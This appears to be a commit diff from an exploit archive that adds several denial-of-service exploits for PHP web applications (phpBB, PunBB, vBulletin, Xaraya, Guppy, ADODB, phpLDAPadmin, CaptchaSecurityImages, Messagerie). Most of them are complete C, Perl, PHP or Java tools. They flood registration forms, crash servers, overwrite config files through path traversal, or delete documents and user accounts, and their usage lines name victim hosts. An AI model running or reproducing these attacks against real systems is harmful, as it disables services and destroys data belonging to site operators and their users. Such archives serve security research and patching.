char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";
if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Hack%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}
sprintf(str2, "POST %s%s HTTP/1.1\r\n"
"Host: %s\r\n"
"Referer: http://%s/\r\n%s"
"Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}
char Use(char *program)
{
fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);
fflush(stdout);
exit(-1);
}
/*
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
// milw0rm.com [2005-06-22]

27
platforms/php/dos/11397.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: CaptchaSecurityImages.php Denial Of Service
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
#
##[Denial Of Service]
(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.)
#
#Exploit:
/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337
#
#
The vuln code is: (lines 73-75)
#
$width = isset($_GET['width']) ? $_GET['width'] : '120';
$height = isset($_GET['height']) ? $_GET['height'] : '40';
$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : '6';
#
To fix it- delete all the "$_GET[x]" strings and make it constant, like this:
#
$width=100;
$height=40;
$characters=5;
#
#
#[e0f]

44
platforms/php/dos/12186.pl Executable file
View file

@ -0,0 +1,44 @@
# DOS Vbulletin 92% Works ;)
#
# Tested on all versions! and can DOS the server
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};

211
platforms/php/dos/1345.php Executable file
View file

@ -0,0 +1,211 @@
<?php
# ---Xaraya_DOS.php 17.30 28/11/2005 #
# #
# Xaraya <=1.0.0 RC4 D.O.S #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "Hold out baits to entice the enemy. Feign disorder, #
# and crush him." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> ******** Xaraya <=1.0.0 rc4 Denial of Service *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********** Xaraya <=1.0.0 rc4 Denial of Service ******** </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/xaraya/ or just / ) </span></p></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 ( default value ) </span> </p>
<p> <input type="text" name="proxy"><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td></tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$proxy=$_POST[proxy];
if (($host<>'') and ($path<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
$KEYFILE=urlencode("../../../../.key.php"); //to create an empty key.php dir...
$HTACCESS=urlencode("../../../../../.htaccess"); //to create an empty .htaccess dir...
$CONFIGFILE=urlencode("../../../../config.system.php".CHR(0x00)); //overwrite configuration file with garbage
$request[0]="index.php?module=".$KEYFILE;
$request[1]="index.php?module=".$HTACCESS;
$request[2]="index.php?module=".$CONFIGFILE;
$request[3]="index.php";
for($i=0; $i<=count($request)-1; $i++)
{
$packet="GET ".$p.$request[$i]." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Zoo Tycoon 2 Client\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
if (eregi('fatal error',$html)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
}
else
{echo "Fill * required fields, optionally specify a proxy";}
?>
# milw0rm.com [2005-11-29]

176
platforms/php/dos/1517.c Executable file
View file

@ -0,0 +1,176 @@
/*
Name: NST-Exploit Punbb 2.0.10 Denial Of Service
Copyright: NeoSecurity
Author: K4P0
[./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
#################################################
PunBB 2.0.10 Denial of Service exploit by K4P0
Use only at your own reputation risk! ;)
www.NeoSecurityTeam.net
#################################################
[1] - Trying if connection is possible...
[2] - Connected!
[3] - Flooding localhost...
Use it at your own risk!.
*/
#define WINDOWS
//#define LINUX
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WINDOWS
#include <winsock2.h>
#include <windows.h>
// Link to (lib)ws2_32.a
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#endif
#define NST_ALIVE 1
int Connect(char*);
void SendPack(int, int, char*, char*);
void _perror(char*);
void HowTo(char*);
int main(int argc, char* argv[])
{
int vict_sock, dos = 0;
puts("#################################################");
puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 ");
puts(" Use only at your own reputation risk! ;) \n");
puts(" www.NeoSecurityTeam.net ");
if(argc < 4) HowTo(argv[0]);
puts("#################################################\n");
printf("[1] - Trying if connection is possible...\n", argv[1]);
fflush(stdout);
vict_sock = Connect(argv[2]);
printf("[2] - Connected!\n");
printf("[3] - Flooding %s", argv[1]);
#ifdef WINDOWS
closesocket(vict_sock);
#else
close(vict_sock);
#endif
while(NST_ALIVE)
{
if(!(dos % 10)) fprintf(stderr, ".");
vict_sock = Connect(argv[2]);
SendPack(vict_sock, dos, argv[3], argv[1]);
dos++;
#ifdef WINDOWS
closesocket(vict_sock);
WSACleanup();
#else
close(vict_sock);
#endif
}
return 0;
}
// I'm to lazy to use gethostby(addr|name) :)
int Connect(char* IP)
{
struct sockaddr_in *_addr;
int vict_sck;
#ifdef WINDOWS
WSADATA wsaData;
if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
//WSAGetLastError()? Nah...
fprintf(stderr, "[*] WSAStartup() failed");
exit(-1);
}
#endif
if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
{
fprintf(stderr, "[*] Unable to reserve memory");
exit(-1);
}
memset(_addr, 0x0, sizeof(struct sockaddr_in));
_addr->sin_family = AF_INET;
_addr->sin_port = htons(80);
_addr->sin_addr.s_addr = inet_addr(IP);
#ifdef WINDOWS
if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0)
{
fprintf(stderr, "WSASocket() failed");
exit(-1);
}
else
if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
_perror("socket() ");
#endif
if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0)
_perror("connect() ");
free(_addr);
return vict_sck;
}
void SendPack(int v_sck, int var, char* path, char* DNS)
{
char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;
if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) ||
!(HTTP_POST = (char *)malloc(512)))
{
fprintf(stderr, "Error trying to reserver memory");
exit(-1);
}
sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n"
"Host: %s\n"
"User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n"
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
"Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
"Keep-Alive: 300\n"
"Proxy-Connection: keep-alive\n"
"Referer: http://%s%sregister.php\n"
"Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path);
sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
"req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var);
sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST));
strcat(HTTP_PACK, HTTP_MPCK);
strcat(HTTP_PACK, HTTP_POST);
send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);
free(HTTP_PACK);
free(HTTP_MPCK);
free(HTTP_POST);
return;
}
void _perror(char* msg)
{
perror(msg);
fflush(stdout);
exit(-1);
}
void HowTo(char* program)
{
fprintf(stderr, "%s <DNS> <IP> <Path>\n", program);
fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n");
fprintf(stderr, "#################################################");
exit(0);
}
// milw0rm.com [2006-02-20]

232
platforms/php/dos/1573.php Executable file
View file

@ -0,0 +1,232 @@
# Change line 30 s/htp/http if you would like to see the logo. /str0ke
<?php
# Guppy <= 4.5.11 Remote DOS Exploit #
# by trueend5 #
# Computer Security Science Researchers Institute #
# [http://www.KAPDA.ir] #
# #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
echo'<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Guppy &lt;= 4.5.11 Remote DOS Exploit</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Guppy &lt;= 4.5.11 Remote DOS
Exploit</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Science Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><a href="http://www.kapda.ir">KAPDA</a></p>
<p align="center"><img border="0" src="http://irannetjob.com/pics/ph-logo.png" width="120" height="121"></p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
<p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex:www.sitename.com)</span></p>
<p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex:
/guppy/
or just / )</span></p>
<p><input name="num" size="20"> <span class="Stile5">how many document
do you want to destroy (default is 100)</span></p>
<p>&nbsp; This option works when magic_quotes_gpc is Off</p>
<p><input name="port" size="20"><span class="Stile5">specify a port&nbsp;
(default is 80)</span></p>
<p><input name="proxy" size="20"><span class="Stile5">send exploit
through an HTTP proxy (ip:port)</span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">&nbsp;&nbsp;
* </font>fields are required</span></p>
<p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';
function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {
echo "<td>0".$datai."</td>";
}
else {
echo "<td>".$datai."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy';die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$_POST[host];
$path=$_POST[path];
$port=$_POST[port];
$num=$_POST[num];
if (($host<>'') and ($path<>''))
{
$port=intval(trim($port));
$num=intval(trim($num));
if ($port=='') {$port=80;}
if ($num=='') {$num=100;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
echo ' Try to see if magic_quotes_gpc is enable! ...';
$packet="GET ".$p."mobile/dwnld.php?pg=./%2E./test.inc%00"." HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$test='http://'.$host.$path.'data/test.inc';
if (!include("$test")) {
echo'It seems magic_quotes_gpc is On. Trying STEP 2 ...';
}
else {echo'magic_quotes_gpc is disable. STEP 1:';
for ($n = 1; $n <= $num; $n++) {
$packet="GET ".$p."mobile/dwnld.php?pg=./%2E./doc".$n.".inc%00"." HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
}
echo' STEP 2:';
for ($n = 1; $n <= 29; $n++) {
if ($n==1) {$str='ar';} if ($n==2) {$str='counter';} if ($n==3) {$str='dn';} if ($n==4) {$str='docid';} if ($n==5) {$str='fa';}
if ($n==6) {$str='fr';} if ($n==7) {$str='frcat';} if ($n==8) {$str='frcount';} if ($n==9) {$str='frth';} if ($n==10) {$str='ippoll';}
if ($n==11) {$str='ipstats';} if ($n==12) {$str='li';} if ($n==13) {$str='log_date';} if ($n==14) {$str='log_files';}
if ($n==15) {$str='log_stats';} if ($n==16) {$str='logbook';} if ($n==17) {$str='logd';} if ($n==18) {$str='logh';}
if ($n==19) {$str='logm';} if ($n==20) {$str='logp';} if ($n==21) {$str='logy';} if ($n==22) {$str='nextid';}
if ($n==23) {$str='nwlist';} if ($n==24) {$str='ph';} if ($n==25) {$str='poll';} if ($n==26) {$str='ra';}
if ($n==27) {$str='rs';} if ($n==28) {$str='stats';} if ($n==29) {$str='statsbk';}
$packet="GET ".$p."mobile/dwnld.php?pg=./%2E./$str"." HTTP/1.1\r\n";
$packet.="User-Agent: SnoopRob/x.x\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
$test2='http://'.$host.$path.'data/stats.dtb';
include("$test2");
if (eregi("1",$html)) {echo "Exploit succeeded"; }
else {echo "Exploit failed...";}
}
else
{echo "IMPORTANT NOTICE: This POC is just for educational purposes, Please Do not use it against external websites<br>
You are responsible for any damage that .... ";}
?>
# milw0rm.com [2006-03-10]

107
platforms/php/dos/1651.php Executable file
View file

@ -0,0 +1,107 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to ADODB\r\n";
echo "redo: how many times?\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80\r\n";
die;
}
/*
tested against Apache/1.3.27 (Win32) PHP/4.3.3
closelog() func close the connection to the system logger, but if its handle
is never initialized, Windows exception is raised by the php4ts.dll
module at address 0x00000000100bf014.
By sending multiple requests to the tmssql.php script, which allow
execution of an arbitrary function without arguments, this will cause
the Apache process to crash and to consume a large amount of memory
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port."\r\n";
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';
}
}
fputs($ock,$packet);
fclose($ock);
}
$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
for ($i=1; $i<=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?>
# milw0rm.com [2006-04-09]

138
platforms/php/dos/18023.java Executable file
View file

@ -0,0 +1,138 @@
/**
* Exploit Title: phpLDAPadmin 0.9.4b DoS
* Google Dork: "phpLDAPadmin - 0.9.4b"
* Date: 2011-10-23
* Author: Alguien
* Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/
* Version: 0.9.4b
* Tested on: Red Hat
* CVE : -
*
* Compilation:
* ------------
* $ javac phpldos.java
*
* Usage:
* ------
* $ java phpldos <host> <path> <threads>
*
* Example:
* --------
* $ java phpldos www.example.com /phpldapadmin/ 10
*
* Explanation:
* ------------
* The file "common.php" is vulnerable to LFI through the "Accept-Language"
* HTTP header.
*
* if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
* // get the languages which are spetcified in the HTTP header
* $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
* $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
* foreach( $HTTP_LANGS2 as $key => $value ) {
* $value=preg_split ("/[-]+/", $value );
* $HTTP_LANGS2[$key]=$value[0];
* }
*
* $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2);
* foreach( $HTTP_LANGS as $HTTP_LANG) {
* // try to grab one after the other the language file
* if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) &&
* is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) {
* ob_start();
* include realpath( "lang/recoded/$HTTP_LANG.php" );
* ob_end_clean();
* break;
* }
* }
* }
*
* This exploit sends "../../common" in the Accept-Language header in order to
* generate a recursive inclusions and cause a denial of service via resource
* exhaustion.
*
* GET /phpldapadmin/common.php HTTP/1.1\r\n
* Host: www.example.com\r\n
* Accept-Language: ../../common\r\n
* Connection: close\r\n
* \r\n
*
*/
import java.io.PrintStream;
import java.net.InetSocketAddress;
import java.net.Socket;
class phpldos implements Runnable {
public static final int HTTP_PORT = 80;
public static final int TIMEOUT = 10000;
private static String host;
private static String path;
private Socket sk;
private PrintStream ps;
public void run() {
while (true) {
if (!open_connection()) {
System.out.println("[+] Mission complete. Server is down };]");
break;
}
send_attack();
try {
ps.close();
sk.close();
} catch (Exception e) {
// D'oh!
}
}
}
private boolean open_connection() {
try {
sk = new Socket();
sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT);
ps = new PrintStream(sk.getOutputStream());
} catch (Exception e) {
return false;
}
return true;
}
private void send_attack() {
try {
String message = ""
+ "GET " + path + "common.php HTTP/1.1\r\n"
+ "Host: " + host + "\r\n"
+ "Accept-Language: ../../common\r\n"
+ "Connection: close\r\n"
+ "\r\n";
ps.print(message);
} catch (Exception e) {
// D'oh!
}
}
public static void main(String[] args) {
if (args.length != 3) {
usage();
}
host = args[0];
path = args[1];
int threads = Integer.parseInt(args[2]);
System.out.println("[+] Attacking with " + threads + " threads.");
for (int i = 0; i < threads; i++) {
new Thread(new phpldos()).start();
}
}
public static void usage() {
System.out.print(
"###########################################################\n"
+ "# phpLDAPadmin DoS #\n"
+ "# by: Alguien - http://alguienenlafisi.blogspot.com #\n"
+ "###########################################################\n"
+ "Syntax : java phpldos <host> <path> <threads>\n"
+ "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n");
System.exit(1);
}
}

12
platforms/php/dos/21428.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/4635/info
Messagerie is a web message board application maintained by La Basse.
An issue has been discovered in Messagerie, which could allow an attacker to delete arbitrary user accounts.
Reportedly, submitting a specially crafted URL will successfully remove user accounts.
It should be noted that known usernames of the system is required.
http://www.host.com/supp_membre.php?choix_membre_supp=polom

7
